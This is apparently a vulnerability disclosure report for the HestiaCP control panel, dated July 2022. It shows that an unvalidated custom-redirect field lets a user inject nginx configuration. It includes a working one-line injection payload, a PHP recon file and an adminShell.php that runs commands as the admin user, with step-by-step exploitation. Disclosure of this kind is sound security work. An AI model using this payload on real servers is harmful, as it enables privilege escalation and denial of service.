Improper Input Validation Leads to Privilege Escalation and Denial of Service in hestiacp/hestiacp
Reported on
Jul 26th 2022
Description
Improper input validation allows an attacker to privilege escalation and can make crash nginx server.
There is no input validation in the v-add-web-domain-redirect#L82, and "v-redirect-custom" input on the "Edit Web Domain" page, inputs are written directly to the /home/user/conf/web/domain.com/nginx.conf_redirect file. This file is included in /home/user/conf/web/domain.com/nginx.conf file.
/home/user/conf/web/domain.com/nginx.conf
...
location ~ /\.(?!well-known\/|file) {
deny all;
return 404;
}
include /home/test/conf/web/poc.com/nginx.conf_*;
}
/home/user/conf/web/domain.com/nginx.conf_redirect file before payload (input is "asd")
if ($host != "asd") {
return 301 $scheme://asd$request_uri;
}
/home/user/conf/web/domain.com/nginx.conf_redirect file after payload
if ($host != "redStar$request_uri; ## " ) {} location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock; } if ( $host = false ) { #") {
return 301 $scheme://redStar$request_uri; ## " ) {} location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock; } if ( $host = false ) { #$request_uri;
}
Proof of Concept
Payload ( has to be one line! )
redStar$request_uri; ## " ) {} location /adminShell.php { alias [FULLPATHINFO]; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-[HOSTNAME].sock; } if ( $host = false ) { #
Exploiting
[0] login as user
[1] Create a domain in dashbard
[2] go to Files in top bar
[3] go to "public_html" folder and create a php file contains like below, visit php file with browser, prepare your payload with fullpath and hostname information.
x.php
<?php
echo getcwd();
echo "<br>";
system("hostname");
[4] go to "Edit Web Domain" page in dashboard, select "Enable domain redirection" then select "Redirect visitors to a custom domain or web address", enter payload to text box and click save button.
[5] go to "public_html" folder, create a php file named adminShell.php
adminShell.php
<?php
system("id; whoami;");
[6] Visit /adminShell.php with browser, commands running as "admin" user.
PoC Video
https://drive.google.com/file/d/1ynnw0C-5dbtxW21aLt4jemUPrCthyXEj/view?usp=sharing
Impact
Attackers can perform an privilege escalation attack and a denial-of-service attack.